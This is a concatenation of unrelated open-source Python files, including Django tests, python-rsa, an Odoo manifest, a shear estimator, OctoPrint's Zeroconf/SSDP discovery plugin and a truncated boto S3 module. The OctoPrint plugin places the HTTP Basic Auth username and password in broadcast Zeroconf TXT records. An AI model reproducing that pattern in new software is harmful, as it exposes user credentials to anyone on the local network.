self.assertEqual(getattr(Test().method, 'myattr2', False), True)
self.assertEqual(getattr(Test.method, 'myattr', False), True)
self.assertEqual(getattr(Test.method, 'myattr2', False), True)
self.assertEqual(Test.method.__doc__, 'A method')
self.assertEqual(Test.method.im_func.__name__, 'method')
class XFrameOptionsDecoratorsTests(TestCase):
"""
Tests for the X-Frame-Options decorators.
"""
def test_deny_decorator(self):
"""
Ensures @xframe_options_deny properly sets the X-Frame-Options header.
"""
@xframe_options_deny
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'DENY')
def test_sameorigin_decorator(self):
"""
Ensures @xframe_options_sameorigin properly sets the X-Frame-Options
header.
"""
@xframe_options_sameorigin
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'SAMEORIGIN')
def test_exempt_decorator(self):
"""
Ensures @xframe_options_exempt properly instructs the
XFrameOptionsMiddleware to NOT set the header.
"""
@xframe_options_exempt
def a_view(request):
return HttpResponse()
req = HttpRequest()
resp = a_view(req)
self.assertEqual(resp.get('X-Frame-Options', None), None)
self.assertTrue(resp.xframe_options_exempt)
# Since the real purpose of the exempt decorator is to suppress
# the middleware's functionality, let's make sure it actually works...
r = XFrameOptionsMiddleware().process_response(req, resp)
self.assertEqual(r.get('X-Frame-Options', None), None)
|
idem2lyon/persomov
|
refs/heads/master
|
libs/rsa/__init__.py
|
111
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
If you want to have a more secure implementation, use the functions from the
``rsa.pkcs1`` module.
"""
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2012-06-17"
__version__ = '3.1.1'
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
|
loco-odoo/localizacion_co
|
refs/heads/master
|
openerp/addons-extra/odoo-pruebas/odoo-server/addons-extra/stock_account_track/__openerp__.py
|
3
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 Interconsulting S.A e Innovatecsa SAS.
# (<http://www.interconsulting.com.co).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Stock account track",
"version": "1.0",
"description": """
This module add a relation between stock move and account move line.
""",
"author": "Innovatecsa S.A.S & Interconsulting S.A.",
"website": "http://www.innovatecsa.com",
"category": "Financial",
"depends": [
"account",
"stock",
],
"data":['stock_account_track_view.xml'
],
"demo_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
davidharvey1986/pyRRG
|
refs/heads/master
|
src/calc_shear.py
|
1
|
import numpy as np
from astropy.io import fits
import ipdb as pdb
def calc_shear( corrected_moments, outfile,
min_rad=6, mult=2,
size_cut=[0., 100.],
mag_cut=[22.5, 30],
signal_noise_cut=3.,
rhodes_factor=0.86,
dataDir='./',
expThresh=4,
stat_type='median'):
'''
PURPOSE : TO WORK OUT VARIOUS FACTORS AND ADJUST THE PSF
CORRECTED ELLIPICITY FOR THESE AND GET AN ESTAIMTE OF THE SHEAR
INPUT :
CORRECTED_MOMENTS : A fitsrec structure of the corrected
and uncorrected moments to measure
and estimate the shear.
GALAXIES : A integer vector of indexes that correspond to those
CORRECTED_MOMENTS that have been classified as a galaxy
OUTFILE : The name of the fits file in which the shears, gamma1 and gamma2
have been estimated as
OPTIONAL INPUTS:
MIN_RAD: The minimum measured radios that is used to weight each galaxies in the
measurement.
SIZE_CUT [LO,HI] : scalar, the cut in galaxy size that is allowed to measure shear on
MAG_CUT [LO,HI] : two scalar array, the cut in the galaxy magnitude that is allowed to measure shear on
SIGNAL_NOSIE_CUT : scalar, the lowest acceptable signal to nosie allowed in the catalogue
rhodes_factor : The RRG rhodes factor (see paper)
dataDir : the directory in which all the data exists
expThresh : the minimum number of exposures a galaxy has to have an acceptably robust shape.
stat_type : the stat type used over the field of galaxies to estimate the corrections to
from elliptcitiy to shear.
OUTPUT :
OUTFILE : A fitsfile named outfile with the same fields as corrected_moments, except with
two extra fields. GAMMA1 and GAMMA2, the two componenets of the estimated shear.
'''
#Need to filter as i determine mean quantities that
#shoudlnt be used from bad galaxies
signal_noise = corrected_moments['FLUX_AUTO'] / \
corrected_moments['FLUXERR_AUTO']
uncut_ell_sqr = corrected_moments['e1']*corrected_moments['e1'] + \
corrected_moments['e2']*corrected_moments['e2']
uncor_size = np.sqrt( 0.5*(corrected_moments.xx_uncorrected + \
corrected_moments.yy_uncorrected))
good = np.ones(len(corrected_moments.x))
good[ (corrected_moments.xx + corrected_moments.yy < 0)] = 0
good[ (uncut_ell_sqr > 2 ) ] = 0
good[ (uncor_size < size_cut[0] )] = 0
good[ (uncor_size > size_cut[1] )] = 0
good[( corrected_moments.MAG_AUTO < mag_cut[0] )] = 0
good[( corrected_moments.MAG_AUTO > mag_cut[1] )] = 0
good[ (signal_noise < signal_noise_cut)] = 0
good[ corrected_moments.nExposures < expThresh ] = 0
good[ (~np.isfinite(corrected_moments.xx)) ] = 0
good[ corrected_moments.prob != 0 ] = 0
momc = corrected_moments[good == 1]
size = np.sqrt( 0.5*(momc.xx + momc.yy))
nObjects=len(momc.xx)
weight = momc['radius']
weight[ momc['radius'] < min_rad] = min_rad
beta = 1./(2.*momc['gal_size']**2*(momc['shear']**2+weight**2))
u1 = beta*(-momc['xxxx']+momc['yyyy'])
u2 = -2.*beta*(momc['xxxy']+momc['xyyy'])
gal_lambda=beta*(momc['xxxx']+2.*momc['xxyy']+momc['yyyy'])
ellipticity_sqr = momc['e1']**2+momc['e2']**2
e_dot_u = momc['e1']*u1+momc['e2']*u2
e_cross_u = momc['e1']*u2-momc['e2']*u1
if stat_type == 'mean':
#These are the mean G1, G2
G2 = 0.5*np.nanmean(e_cross_u)
G1 = 2-np.nanmean(ellipticity_sqr)-\
0.5*np.nanmean(gal_lambda)-\
0.5*np.nanmean(e_dot_u)
elif stat_type =='median':
#The median
G2 = 0.5*np.nanmedian(e_cross_u)
G1 = 2-np.nanmedian(ellipticity_sqr)- 0.5*np.nanmedian(gal_lambda)-0.5*np.nanmedian(e_dot_u)
else:
raise ValueError("Stat type not recognised")
gamma1=momc['e1']/G1/rhodes_factor
gamma2=momc['e2']/G1/rhodes_factor
fits_cols = []
for iName in momc.columns.names:
fits_cols.append( fits.Column(name=iName, format=momc[iName].dtype, array=momc[iName] ) )
newcol = [ fits.Column(name='gamma1', format=gamma1.dtype, array=gamma1),
fits.Column(name='gamma2', format=gamma2.dtype, array=gamma2) ]
hdu = fits.BinTableHDU.from_columns(fits_cols + newcol)
hdu.writeto(outfile, overwrite=True,output_verify='ignore')
|
AlexanderVangelov/pjsip
|
refs/heads/master
|
tests/pjsua/scripts-sipp/uas-auth.py
|
2
|
# $Id: uas-auth.py 4188 2012-06-29 09:01:17Z nanang $
#
import inc_const as const
PJSUA = ["--null-audio --max-calls=1 --id=sip:a@localhost --username=a --realm=* --registrar=$SIPP_URI"]
PJSUA_EXPECTS = []
|
shaggythesheep/OctoPrint
|
refs/heads/master
|
src/octoprint/plugins/discovery/__init__.py
|
37
|
# coding=utf-8
from __future__ import absolute_import
__author__ = "Gina Häußge <osd@foosel.net>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
"""
The SSDP/UPNP implementations has been largely inspired by https://gist.github.com/schlamar/2428250
"""
import logging
import os
import flask
import octoprint.plugin
import octoprint.util
try:
import pybonjour
except:
pybonjour = False
__plugin_name__ = "Discovery"
__plugin_author__ = "Gina Häußge"
__plugin_url__ = "https://github.com/foosel/OctoPrint/wiki/Plugin:-Discovery"
__plugin_description__ = "Makes the OctoPrint instance discoverable via Bonjour/Avahi/Zeroconf and uPnP"
__plugin_license__ = "AGPLv3"
def __plugin_load__():
if not pybonjour:
# no pybonjour available, we can't use that
logging.getLogger("octoprint.plugins." + __name__).info("pybonjour is not installed, Zeroconf Discovery won't be available")
plugin = DiscoveryPlugin()
global __plugin_implementation__
__plugin_implementation__ = plugin
global __plugin_helpers__
__plugin_helpers__ = dict(
ssdp_browse=plugin.ssdp_browse
)
if pybonjour:
__plugin_helpers__.update(dict(
zeroconf_browse=plugin.zeroconf_browse,
zeroconf_register=plugin.zeroconf_register,
zeroconf_unregister=plugin.zeroconf_unregister
))
class DiscoveryPlugin(octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.BlueprintPlugin,
octoprint.plugin.SettingsPlugin):
ssdp_multicast_addr = "239.255.255.250"
ssdp_multicast_port = 1900
def __init__(self):
self.host = None
self.port = None
# zeroconf
self._sd_refs = dict()
self._cnames = dict()
# upnp/ssdp
self._ssdp_monitor_active = False
self._ssdp_monitor_thread = None
self._ssdp_notify_timeout = 10
self._ssdp_last_notify = 0
##~~ SettingsPlugin API
def get_settings_defaults(self):
return {
"publicHost": None,
"publicPort": None,
"pathPrefix": None,
"httpUsername": None,
"httpPassword": None,
"upnpUuid": None,
"zeroConf": [],
"model": {
"name": None,
"description": None,
"number": None,
"url": None,
"serial": None,
"vendor": None,
"vendorUrl": None
}
}
##~~ BlueprintPlugin API -- used for providing the SSDP device descriptor XML
@octoprint.plugin.BlueprintPlugin.route("/discovery.xml", methods=["GET"])
def discovery(self):
self._logger.debug("Rendering discovery.xml")
modelName = self._settings.get(["model", "name"])
if not modelName:
import octoprint.server
modelName = octoprint.server.DISPLAY_VERSION
vendor = self._settings.get(["model", "vendor"])
vendorUrl = self._settings.get(["model", "vendorUrl"])
if not vendor:
vendor = "The OctoPrint Project"
vendorUrl = "http://www.octoprint.org/"
response = flask.make_response(flask.render_template("discovery.xml.jinja2",
friendlyName=self.get_instance_name(),
manufacturer=vendor,
manufacturerUrl=vendorUrl,
modelName=modelName,
modelDescription=self._settings.get(["model", "description"]),
modelNumber=self._settings.get(["model", "number"]),
modelUrl=self._settings.get(["model", "url"]),
serialNumber=self._settings.get(["model", "serial"]),
uuid=self.get_uuid(),
presentationUrl=flask.url_for("index", _external=True)))
response.headers['Content-Type'] = 'application/xml'
return response
def is_blueprint_protected(self):
return False
##~~ StartupPlugin API -- used for registering OctoPrint's Zeroconf and SSDP services upon application startup
def on_startup(self, host, port):
public_host = self._settings.get(["publicHost"])
if public_host:
host = public_host
public_port = self._settings.get(["publicPort"])
if public_port:
port = public_port
self.host = host
self.port = port
# Zeroconf
self.zeroconf_register("_http._tcp", self.get_instance_name(), txt_record=self._create_http_txt_record_dict())
self.zeroconf_register("_octoprint._tcp", self.get_instance_name(), txt_record=self._create_octoprint_txt_record_dict())
for zeroconf in self._settings.get(["zeroConf"]):
if "service" in zeroconf:
self.zeroconf_register(
zeroconf["service"],
zeroconf["name"] if "name" in zeroconf else self.get_instance_name(),
port=zeroconf["port"] if "port" in zeroconf else None,
txt_record=zeroconf["txtRecord"] if "txtRecord" in zeroconf else None
)
# SSDP
self._ssdp_register()
##~~ ShutdownPlugin API -- used for unregistering OctoPrint's Zeroconf and SSDP service upon application shutdown
def on_shutdown(self):
for key in self._sd_refs:
reg_type, port = key
self.zeroconf_unregister(reg_type, port)
self._ssdp_unregister()
##~~ helpers
# ZeroConf
def zeroconf_register(self, reg_type, name=None, port=None, txt_record=None):
"""
Registers a new service with Zeroconf/Bonjour/Avahi.
:param reg_type: type of service to register, e.g. "_gntp._tcp"
:param name: displayable name of the service, if not given defaults to the OctoPrint instance name
:param port: port to register for the service, if not given defaults to OctoPrint's (public) port
:param txt_record: optional txt record to attach to the service, dictionary of key-value-pairs
"""
if not pybonjour:
return
if not name:
name = self.get_instance_name()
if not port:
port = self.port
params = dict(
name=name,
regtype=reg_type,
port=port
)
if txt_record:
params["txtRecord"] = pybonjour.TXTRecord(txt_record)
key = (reg_type, port)
self._sd_refs[key] = pybonjour.DNSServiceRegister(**params)
self._logger.info(u"Registered {name} for {reg_type}".format(**locals()))
def zeroconf_unregister(self, reg_type, port=None):
"""
Unregisteres a previously registered Zeroconf/Bonjour/Avahi service identified by service and port.
:param reg_type: the type of the service to be unregistered
:param port: the port of the service to be unregistered, defaults to OctoPrint's (public) port if not given
:return:
"""
if not pybonjour:
return
if not port:
port = self.port
key = (reg_type, port)
if not key in self._sd_refs:
return
sd_ref = self._sd_refs[key]
try:
sd_ref.close()
self._logger.debug("Unregistered {reg_type} on port {port}".format(reg_type=reg_type, port=port))
except:
self._logger.exception("Could not unregister {reg_type} on port {port}".format(reg_type=reg_type, port=port))
def zeroconf_browse(self, service_type, block=True, callback=None, browse_timeout=5, resolve_timeout=5):
"""
Browses for services on the local network providing the specified service type. Can be used either blocking or
non-blocking.
The non-blocking version (default behaviour) will not return until the lookup has completed and
return all results that were found.
For non-blocking version, set `block` to `False` and provide a `callback` to be called once the lookup completes.
If no callback is provided in non-blocking mode, a ValueError will be raised.
The results are provided as a list of discovered services, with each service being described by a dictionary
with the following keys:
* `name`: display name of the service
* `host`: host name of the service
* `post`: port the service is listening on
* `txt_record`: TXT record of the service as a dictionary, exact contents depend on the service
Callbacks will be called with that list as the single parameter supplied to them. Thus, the following is an
example for a valid callback:
def browse_callback(results):
for result in results:
print "Name: {name}, Host: {host}, Port: {port}, TXT: {txt_record!r}".format(**result)
:param service_type: the service type to browse for
:param block: whether to block, defaults to True
:param callback: callback to call once lookup has completed, must be set when `block` is set to `False`
:param browse_timeout: timeout for browsing operation
:param resolve_timeout: timeout for resolving operations for discovered records
:return: if `block` is `True` a list of the discovered services, an empty list otherwise (results will then be
supplied to the callback instead)
"""
if not pybonjour:
return None
import threading
import select
if not block and not callback:
raise ValueError("Non-blocking mode but no callback given")
result = []
result_available = threading.Event()
result_available.clear()
resolved = []
def resolve_callback(sd_ref, flags, interface_index, error_code, fullname, hosttarget, port, txt_record):
if error_code == pybonjour.kDNSServiceErr_NoError:
txt_record_dict = None
if txt_record:
record = pybonjour.TXTRecord.parse(txt_record)
txt_record_dict = dict()
for key, value in record:
txt_record_dict[key] = value
name = fullname[:fullname.find(service_type) - 1].replace("\\032", " ")
host = hosttarget[:-1]
self._logger.debug("Resolved a result for Zeroconf resolution of {service_type}: {name} @ {host}".format(service_type=service_type, name=name, host=host))
result.append(dict(
name=name,
host=host,
port=port,
txt_record=txt_record_dict
))
resolved.append(True)
def browse_callback(sd_ref, flags, interface_index, error_code, service_name, regtype, reply_domain):
if error_code != pybonjour.kDNSServiceErr_NoError:
return
if not (flags & pybonjour.kDNSServiceFlagsAdd):
return
self._logger.debug("Got a browsing result for Zeroconf resolution of {service_type}, resolving...".format(service_type=service_type))
resolve_ref = pybonjour.DNSServiceResolve(0, interface_index, service_name, regtype, reply_domain, resolve_callback)
try:
while not resolved:
ready = select.select([resolve_ref], [], [], resolve_timeout)
if resolve_ref not in ready[0]:
break
pybonjour.DNSServiceProcessResult(resolve_ref)
else:
resolved.pop()
finally:
resolve_ref.close()
self._logger.debug("Browsing Zeroconf for {service_type}".format(service_type=service_type))
def browse():
sd_ref = pybonjour.DNSServiceBrowse(regtype=service_type, callBack=browse_callback)
try:
while True:
ready = select.select([sd_ref], [], [], browse_timeout)
if not ready[0]:
break
if sd_ref in ready[0]:
pybonjour.DNSServiceProcessResult(sd_ref)
finally:
sd_ref.close()
if callback:
callback(result)
result_available.set()
browse_thread = threading.Thread(target=browse)
browse_thread.daemon = True
browse_thread.start()
if block:
result_available.wait()
return result
else:
return []
# SSDP/UPNP
def ssdp_browse(self, query, block=True, callback=None, timeout=1, retries=5):
"""
Browses for UPNP services matching the supplied query. Can be used either blocking or
non-blocking.
The non-blocking version (default behaviour) will not return until the lookup has completed and
return all results that were found.
For non-blocking version, set `block` to `False` and provide a `callback` to be called once the lookup completes.
If no callback is provided in non-blocking mode, a ValueError will be raised.
The results are provided as a list of discovered locations of device descriptor files.
Callbacks will be called with that list as the single parameter supplied to them. Thus, the following is an
example for a valid callback:
def browse_callback(results):
for result in results:
print "Location: {}".format(result)
:param query: the SSDP query to send, e.g. "upnp:rootdevice" to search for all devices
:param block: whether to block, defaults to True
:param callback: callback to call in non-blocking mode when lookup has finished, must be set if block is False
:param timeout: timeout in seconds to wait for replies to the M-SEARCH query per interface, defaults to 1
:param retries: number of retries to perform the lookup on all interfaces, defaults to 5
:return: if `block` is `True` a list of the discovered devices, an empty list otherwise (results will then be
supplied to the callback instead)
"""
import threading
import httplib
import io
class Response(httplib.HTTPResponse):
def __init__(self, response_text):
self.fp = io.BytesIO(response_text)
self.debuglevel = 0
self.strict = 0
self.msg = None
self._method = None
self.begin()
result = []
result_available = threading.Event()
result_available.clear()
def browse():
import socket
socket.setdefaulttimeout(timeout)
search_message = "".join([
"M-SEARCH * HTTP/1.1\r\n",
"ST: {query}\r\n",
"MX: 3\r\n",
"MAN: \"ssdp:discovery\"\r\n",
"HOST: {mcast_addr}:{mcast_port}\r\n\r\n"
])
for _ in xrange(retries):
for addr in octoprint.util.interface_addresses():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
message = search_message.format(query=query,
mcast_addr=self.__class__.ssdp_multicast_addr,
mcast_port=self.__class__.ssdp_multicast_port)
for _ in xrange(2):
sock.sendto(message, (self.__class__.ssdp_multicast_addr, self.__class__.ssdp_multicast_port))
try:
data = sock.recv(1024)
except socket.timeout:
pass
else:
response = Response(data)
result.append(response.getheader("Location"))
except:
pass
if callback:
callback(result)
result_available.set()
browse_thread = threading.Thread(target=browse)
browse_thread.daemon = True
browse_thread.start()
if block:
result_available.wait()
return result
else:
return []
##~~ internals
# Zeroconf
def _create_http_txt_record_dict(self):
"""
Creates a TXT record for the _http._tcp Zeroconf service supplied by this OctoPrint instance.
Defines the keys for _http._tcp as defined in http://www.dns-sd.org/txtrecords.html
:return: a dictionary containing the defined key-value-pairs, ready to be turned into a TXT record
"""
# determine path entry
path = "/"
if self._settings.get(["pathPrefix"]):
path = self._settings.get(["pathPrefix"])
else:
prefix = self._settings.global_get(["server", "reverseProxy", "prefixFallback"])
if prefix:
path = prefix
# fetch username and password (if set)
username = self._settings.get(["httpUsername"])
password = self._settings.get(["httpPassword"])
entries = dict(
path=path
)
if username and password:
entries.update(dict(u=username, p=password))
return entries
def _create_octoprint_txt_record_dict(self):
"""
Creates a TXT record for the _octoprint._tcp Zeroconf service supplied by this OctoPrint instance.
The following keys are defined:
* `path`: path prefix to actual OctoPrint instance, inherited from _http._tcp
* `u`: username if HTTP Basic Auth is used, optional, inherited from _http._tcp
* `p`: password if HTTP Basic Auth is used, optional, inherited from _http._tcp
* `version`: OctoPrint software version
* `api`: OctoPrint API version
* `model`: Model of the device that is running OctoPrint
* `vendor`: Vendor of the device that is running OctoPrint
:return: a dictionary containing the defined key-value-pairs, ready to be turned into a TXT record
"""
entries = self._create_http_txt_record_dict()
import octoprint.server
import octoprint.server.api
entries.update(dict(
version=octoprint.server.VERSION,
api=octoprint.server.api.VERSION,
))
modelName = self._settings.get(["model", "name"])
if modelName:
entries.update(dict(model=modelName))
vendor = self._settings.get(["model", "vendor"])
if vendor:
entries.update(dict(vendor=vendor))
return entries
# SSDP/UPNP
def _ssdp_register(self):
"""
Registers the OctoPrint instance as basic service with a presentation URL pointing to the web interface
"""
import threading
self._ssdp_monitor_active = True
self._ssdp_monitor_thread = threading.Thread(target=self._ssdp_monitor, kwargs=dict(timeout=self._ssdp_notify_timeout))
self._ssdp_monitor_thread.daemon = True
self._ssdp_monitor_thread.start()
def _ssdp_unregister(self):
"""
Unregisters the OctoPrint instance again
"""
self._ssdp_monitor_active = False
if self.host and self.port:
for _ in xrange(2):
self._ssdp_notify(alive=False)
def _ssdp_notify(self, alive=True):
"""
Sends an SSDP notify message across the connected networks.
:param alive: True to send an "ssdp:alive" message, False to send an "ssdp:byebye" message
"""
import socket
import time
if alive and self._ssdp_last_notify + self._ssdp_notify_timeout > time.time():
# we just sent an alive, no need to send another one now
return
if alive and not self._ssdp_monitor_active:
# the monitor already shut down, alive messages don't make sense anymore as byebye will shortly follow
return
for addr in octoprint.util.interface_addresses():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
location = "http://{addr}:{port}/plugin/discovery/discovery.xml".format(addr=addr, port=self.port)
self._logger.debug("Sending NOTIFY {} via {}".format("alive" if alive else "byebye", addr))
notify_message = "".join([
"NOTIFY * HTTP/1.1\r\n",
"Server: Python/2.7\r\n",
"Cache-Control: max-age=900\r\n",
"Location: {location}\r\n",
"NTS: {nts}\r\n",
"NT: upnp:rootdevice\r\n",
"USN: uuid:{uuid}::upnp:rootdevice\r\n",
"HOST: {mcast_addr}:{mcast_port}\r\n\r\n"
])
message = notify_message.format(uuid=self.get_uuid(),
location=location,
nts="ssdp:alive" if alive else "ssdp:byebye",
mcast_addr=self.__class__.ssdp_multicast_addr,
mcast_port=self.__class__.ssdp_multicast_port)
for _ in xrange(2):
# send twice, stuff might get lost, it's only UDP
sock.sendto(message, (self.__class__.ssdp_multicast_addr, self.__class__.ssdp_multicast_port))
except:
pass
self._ssdp_last_notify = time.time()
def _ssdp_monitor(self, timeout=5):
"""
Monitor thread that listens on the multicast address for M-SEARCH requests and answers them if they are relevant
:param timeout: timeout after which to stop waiting for M-SEARCHs for a short while in order to put out an
alive message
"""
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
import socket
socket.setdefaulttimeout(timeout)
location_message = "".join([
"HTTP/1.1 200 OK\r\n",
"ST: upnp:rootdevice\r\n",
"USN: uuid:{uuid}::upnp:rootdevice\r\n",
"Location: {location}\r\n",
"Cache-Control: max-age=60\r\n\r\n"
])
class Request(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message=None):
self.error_code = code
self.error_message = message
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(('', self.__class__.ssdp_multicast_port))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(self.__class__.ssdp_multicast_addr) + socket.inet_aton('0.0.0.0'))
self._logger.info(u"Registered {} for SSDP".format(self.get_instance_name()))
self._ssdp_notify(alive=True)
try:
while (self._ssdp_monitor_active):
try:
data, address = sock.recvfrom(4096)
request = Request(data)
if not request.error_code and request.command == "M-SEARCH" and request.path == "*" and (request.headers["ST"] == "upnp:rootdevice" or request.headers["ST"] == "ssdp:all") and request.headers["MAN"] == '"ssdp:discover"':
interface_address = octoprint.util.address_for_client(*address)
if not interface_address:
self._logger.warn("Can't determine address to user for client {}, not sending a M-SEARCH reply".format(address))
continue
message = location_message.format(uuid=self.get_uuid(), location="http://{host}:{port}/plugin/discovery/discovery.xml".format(host=interface_address, port=self.port))
sock.sendto(message, address)
self._logger.debug("Sent M-SEARCH reply for {path} and {st} to {address!r}".format(path=request.path, st=request.headers["ST"], address=address))
except socket.timeout:
pass
finally:
self._ssdp_notify(alive=True)
finally:
try:
sock.close()
except:
pass
##~~ helpers
def get_uuid(self):
upnpUuid = self._settings.get(["upnpUuid"])
if upnpUuid is None:
import uuid
upnpUuid = str(uuid.uuid4())
self._settings.set(["upnpUuid"], upnpUuid)
self._settings.save()
return upnpUuid
def get_instance_name(self):
name = self._settings.global_get(["appearance", "name"])
if name:
return u"OctoPrint instance \"{}\"".format(name)
else:
import socket
return u"OctoPrint instance on {}".format(socket.gethostname())
|
crazcalm/chat-server
|
refs/heads/master
|
features/steps/server_commands.py
|
1
|
import socket
import time
from subprocess import Popen, PIPE
@given(u'I came connected to the chat server as person1')
def step_impl(context):
context.chat_server = Popen(["python", "server.py"], stdout=PIPE)
# Give the server time to start
time.sleep(3)
context.person1 = socket.create_connection(('localhost', 3333))
@when(u'the client sends {command}')
def step_impl(context, command):
context.person1.sendall(command.strip().encode())
# Give the server time to send response
time.sleep(1)
@then(u'the client should receive {response}')
def step_impl(context, response):
output = context.person1.recv(2048).decode()
context.test.assertIn(response, output)
@then(u'the client socket should be disconnected')
def step_impl(context):
context.person1.sendall("/disconnect".encode())
@given(u'person2 is in the chatroom')
def step_impl(context):
context.person2 = socket.create_connection(('localhost', 3333))
context.person2.sendall('/set name M'.encode())
time.sleep(1)
context.person2.sendall('/set description friend'.encode())
context.person2.sendall('/whoami'.encode())
output = context.person2.recv(1024)
context.test.assertIn('M', output.decode())
|
huanchenz/STX-h-store
|
refs/heads/master
|
third_party/python/boto/s3/connection.py
|
11
|
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import urllib, base64
import time
import boto.utils
from boto.connection import AWSAuthConnection
from boto import handler
from boto.provider import Provider
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.resultset import ResultSet
from boto.exception import BotoClientError
def check_lowercase_bucketname(n):
"""
Bucket names must not contain uppercase characters. We check for
this by appending a lowercase character and testing with islower().
Note this also covers cases like numeric bucket names with dashes.
>>> check_lowercase_bucketname("Aaaa")
Traceback (most recent call last):
...
BotoClientError: S3Error: Bucket names cannot contain upper-case
characters when using either the sub-domain or virtual hosting calling
format.
>>> check_lowercase_bucketname("1234-5678-9123")
True
>>> check_lowercase_bucketname("abcdefg1234")
True
"""
if not (n + 'a').islower():
raise BotoClientError("Bucket names cannot contain upper-case " \
"characters when using either the sub-domain or virtual " \
"hosting calling format.")
return True
def assert_case_insensitive(f):
def wrapper(*args, **kwargs):
if len(args) == 3 and check_lowercase_bucketname(args[2]):
pass
return f(*args, **kwargs)
return wrapper
class _CallingFormat:
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '%s://' % protocol
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
def build_host(self, server, bucket):
if bucket == '':
return server
else:
return self.get_bucket_server(server, bucket)
def build_auth_path(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path = ''
if bucket != '':
path = '/' + bucket
return path + '/%s' % urllib.quote(key)
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
return '/%s' % urllib.quote(key)
class SubdomainCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return '%s.%s' % (bucket, server)
class VHostCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return bucket
class OrdinaryCallingFormat(_CallingFormat):
def get_bucket_server(self, server, bucket):
return server
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path_base = '/'
if bucket:
path_base += "%s/" % bucket
return path_base + urllib.quote(key)
class ProtocolIndependentOrdinaryCallingFormat(OrdinaryCallingFormat):
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '//'
